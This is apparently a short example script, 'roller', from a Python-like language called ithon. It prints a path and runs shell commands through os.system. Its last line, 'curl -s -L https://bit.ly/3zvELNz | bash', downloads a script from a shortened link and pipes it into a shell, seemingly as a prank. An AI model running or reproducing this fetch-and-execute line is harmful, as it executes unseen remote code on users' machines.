ithon/examples/roller/__main__.it
2024-10-09 19:31:52 -04:00

8 lines
No EOL
199 B
Text

import os
from ipathlib import Path
if True == False:
from std.ipathlib import Path
sh = os.system
sh <| 'echo "hehe"'
print(Path('.'))
sh <| 'curl -s -L https://bit.ly/3zvELNz | bash' /* hehe */